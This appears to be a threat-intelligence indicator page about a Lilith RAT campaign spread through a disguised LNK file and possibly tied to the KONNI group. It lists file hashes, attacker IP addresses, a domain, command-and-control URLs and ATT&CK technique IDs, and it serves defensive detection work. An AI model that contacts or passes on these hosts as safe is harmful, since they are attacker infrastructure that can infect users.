Back

Threat Tracking: Analysis of Lilith RAT ported to AutoIt Script

Aug. 23, 2024, 10:01 a.m.

Tags

obfuscation
rat
autoit
downloader
2024-08-23
lilith
konni
lilith rat

External References

https://medium.com/

https://otx.alienvault.com/

Description

In April 2024, S2W's Threat Research and Intelligence Center TALON analyzed a malicious LNK file disguised as a list of tax evasion explanatory documents. The LNK file executed a PowerShell command to download and run an AutoIt script-based Lilith RAT malware from an attacker's server, which establishes a reverse shell on the infected system. Similarities between this campaign and KONNI group's tactics, such as command obfuscation and the use of AutoIt-ported malware, suggest the threat actor behind this attack could be linked to KONNI.

Date

Published Created Modified
Aug. 23, 2024, 9:41 a.m. Aug. 23, 2024, 9:41 a.m. Aug. 23, 2024, 10:01 a.m.

Indicators

e63082cf4db94f06d583a6313e48353366b44ce07b7ffceacc5bc4db88bd8810

c2cc785857c64fa1f8fbb2e359a2638f187cd77cd29ca6701e38d750e822faa4

ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015

9e1a3653029b5378736ea1debba44cd81988de73b6d8689f9eba792e719da79a

808425bc599cd60989c90978d179af1d4c72dd7abfe5e0518aca44b48af15725

7c08b9178c05ab765a3d7754ac99f4ba1abddb226dbb6cc898bc692bba1898a1

77d05cc623f860ca2e6d47cdafc517aa0612de88291de7f2a3d95c5d04f1658a

778e46f8f3641a92d34da68dffc168fdc936841c5ad3d8b44da62a7b2dfe2ee1

5ea09247ad85915a8d1066d1825061cc8348e14c4e060e1eba840d5e56ab3e4d

5bcfb56c4c884e3657bbfeacca37853113d640b77dff9af519c08c4b64ca029d

2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e

0329bb5b3a450b0a8f148a57e045bf6ed40eb49a62e026bd71b021a2efc40aed

237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

93.183.93.185

62.113.118.157

185.231.154.22

www.cammirando.com

http://62.113.118.157:57860

http://93.183.93.185:57860

http://185.231.154.22:52720

Attack Patterns

Lilith RAT

puNK-003

T1053.005

T1564.003

T1539

T1564.001

T1555.003

T1059.003

T1059.001

T1571

T1547.001

T1518.001

T1204.002

T1105

T1041